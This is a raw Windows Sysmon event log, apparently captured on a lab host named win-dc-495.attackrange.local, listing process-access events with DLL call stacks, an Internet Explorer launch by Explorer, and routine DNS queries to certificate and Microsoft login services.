13:58:39.461{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.461{59A5CD1D-93F9-6005-F504-00000000A301}1756872C:\Windows\system32\taskhostw.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:39.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:39.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program 
Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-93FA-6005-FC04-00000000A301}37846472C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\windows.storage.dll+2d1a2|C:\Windows\System32\windows.storage.dll+2ce99|C:\Windows\System32\windows.storage.dll+2cd6f|C:\Windows\System32\SHELL32.dll+cfc37|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHLWAPI.dll+e1f7 154100x800000000000000013212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.445{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe11.00.14393.2007 (rs1_release.171231-1800)Internet ExplorerInternet ExplorerMicrosoft CorporationIEXPLORE.EXE"C:\Program Files\Internet Explorer\iexplore.exe" 
C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=DED3D744D46A5CE7965CE2B75B54958A,SHA256=70C9616C026266BB3A1213BCC50E3A9A24238703FB7745746628D11163905D2F,IMPHASH=9BB01C801600CEBDCA166D0534E98CE6{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 22542200x800000000000000013211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.419{59A5CD1D-8E46-6005-1600-00000000A301}1544ocsp.digicert.com0type: 5 cs9.wac.phicdn.net;::ffff:93.184.220.29;C:\Windows\System32\svchost.exe 22542200x800000000000000013210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.352{59A5CD1D-8E46-6005-1600-00000000A301}1544login.live.com0type: 5 login.msa.msidentity.com;type: 5 www.tm.lg.prod.aadmsa.akadns.net;type: 5 prda.aadg.msidentity.com;type: 5 www.tm.a.prd.aadg.akadns.net;::ffff:40.126.31.8;::ffff:40.126.31.139;::ffff:40.126.31.141;::ffff:40.126.31.143;::ffff:20.190.159.132;::ffff:20.190.159.134;::ffff:20.190.159.138;::ffff:40.126.31.6;C:\Windows\System32\svchost.exe 22542200x800000000000000013209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.167{59A5CD1D-8E56-6005-2E00-00000000A301}2464208.118.189.20.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000013208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.152{59A5CD1D-8E56-6005-2E00-00000000A301}2464182.79.125.104.in-addr.arpa.0type: 12 a104-125-79-182.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000013207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.368{59A5CD1D-8E56-6005-2E00-00000000A301}2464crl.usertrust.com0::ffff:151.139.128.14;C:\Windows\sysmon64.exe 10341000x800000000000000013270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:40.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.992{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:40.992{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:40.992{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000013266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+5f954|C:\Windows\SYSTEM32\IEFRAME.dll+5f74d|C:\Windows\SYSTEM32\IEFRAME.dll+5f422|C:\Windows\SYSTEM32\IEFRAME.dll+5f177|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:40.304{59A5CD1D-940F-6005-0C05-00000000A301}64766576C:\Program Files\Internet 
